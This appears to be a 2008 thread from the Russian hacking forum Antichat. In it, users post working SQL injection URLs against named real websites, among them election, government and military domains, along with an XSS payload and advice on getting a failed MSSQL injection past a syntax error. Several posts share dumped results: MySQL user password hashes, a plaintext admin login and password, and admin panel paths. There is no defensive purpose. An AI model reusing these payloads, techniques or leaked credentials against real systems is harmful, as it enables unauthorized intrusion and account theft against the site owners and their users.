Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.08.2008, 14:13
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
http://www.innisfil.ca/calendar/index.php?id=327[SQL]&action=SE
Dbname:TownWWW
Version:4.0.18-standard
User:townsql@10.10.17.9
mysql.user
root:617cc18f2733a3b1
ibdusr:1a393d956e785b2d
admin3:04c0e94c36430bdf
admin:6d0089a5205f3116
sql-server в локалке ((
|
|
|
16.08.2008, 15:17
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Багу пофиксели но может кто скажет почему было так
Код:
ttp://www.results.cec.gov.ge//major_olq.php?district=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+table_name+not+in+(char(111)+char(108)+char(113)+char(101)+char(98))))--
Выводилась ошибка
Код:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near 'char'. (severity 15) in /www/html/shedegebi2008parl/major_olq.php on line 14
Вопрос почему? |
|
|
|
16.08.2008, 15:21
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
Shaitan-Devil, это было потому, что у тебя шли функции char, разделенные пробелами, вот так:
Код:
(char(111)+char(108)+char(113)+char(101) +char(98))
Т.к. + здесь будет идти как пробел. А синтаксис SQL это не понимает. Надо было юзать такую конструкцию:
Код:
char(111,108,113,101,98)
|
|
|
|
16.08.2008, 15:36
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Сообщение от А®ТеS
Shaitan-Devil, это было потому, что у тебя шли функции char, разделенные пробелами, вот так:
Код:
(char(111)+char(108)+char(113)+char(101) +char(98))
Т.к. + здесь будет идти как пробел. А синтаксис SQL это не понимает. Надо было юзать такую конструкцию:
Код:
char(111,108,113,101,98)
Разве такая конструкция для МССКЛ а подойдет?Мне казалось это тока стандарт АНСИ
|
|
|
|
16.08.2008, 16:04
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Shaitan-Devil
Разве такая конструкция для МССКЛ а подойдет?Мне казалось это тока стандарт АНСИ
Правильно тебе казалось, надо было + заменить на %2B, тоесть так:
where+table_name+not+in+(char(111)%2Bchar(108)%2Bc har(113)%2Bchar(101)%2Bchar(98))))--
А эта конструкция char(111,108,113,101,98) работать на MSSQL не будет
А ещё лучше Hex
Последний раз редактировалось jokester; 16.08.2008 в 16:07..
|
|
|
|
16.08.2008, 16:16
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Сообщение от jokester
А ещё лучше Hex
В том случае HEX не подходил я уже пробовал
|
|
|
|
16.08.2008, 16:58
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.sinfonie-hausverwaltung.de/news.php?id=-1+union+select+1,2,3,concat(username,0x3a3a,passwo rd),5,6,7,8,9,10,11,12,13,14,16+from+sinfonie_user +limit+1,10/*
login: ice
password: xferrari
http://www.sinfonie-hausverwaltung.de/admin
|
|
|
|
16.08.2008, 20:10
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
http://www.womennet.ca/directory.php?browse&999
http://www.womennet.ca/directory.php?browse&1
какая то скуля,как мне кажется..мне такая еще не встречалась. кто попробует крутнуть?)
|
|
|
|
16.08.2008, 20:33
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744
Репутация:
246
|
|
http://www.womennet.ca/directory.php?browse&"><script>alert('S0ulVortex') </script>
это не скуля это xss помойму
|
|
|
|
16.08.2008, 20:46
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Photohost.ru
http://www.photohost.ru/forum.php?action=viewtopic&topicid=-1+union+select+table_name+from+information_schema. tables+limit+16,1/*
Kinomob.info
http://kinomob.info/system/thumb.php?img_id=1+union+select+version()--
Gpb.ge
http://www.gpb.ge/moambe_news.php?lang=geo&tm_id=-1&news_id=-13712+union+select+1,table_name,3,4,5,6,7,8,9,10,1 1,12+from+information_schema.tables+limit+16,1/*
5 ver. tables
http://www.gpb.ge/moambe_news.php&lang=eng&tm_id=-1&news_id=-13712+union+select+1,2,concat_ws(0x3a,username,pas sword),4,5,6,7,8,9,10,11,12+from+eurovision.authen ticate/*
/admin
Photodom.com
http://www.photodom.com/ru/catalog.php?page=0&id=9)+and+substring(version(),1 ,1)=5/*
Shadeaux.net
http://www.shadeaux.net/hosting/detailspak.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18/*
Hiveprojects.com.au
http://www.hiveprojects.com.au/artist_page.php?id=-1+union+select+1,2,3,4,5,6,7,version(),9,10/*
Bpjt.net
http://www.bpjt.net/index.php?id=null%20union%20all%20select%201,versi on(),3,4,5--
S-dir.net.ua
http://www.s-dir.net.ua/cat/select.php?f_id=-26+union+select+1,2,table_name,4,5,6,7,8,9,10,11+f rom+information_schema.tables/*
Tniad.mil.id
http://www.tniad.mil.id/news.php?id=-2998+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13/*
Последний раз редактировалось sabe; 16.08.2008 в 21:03..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
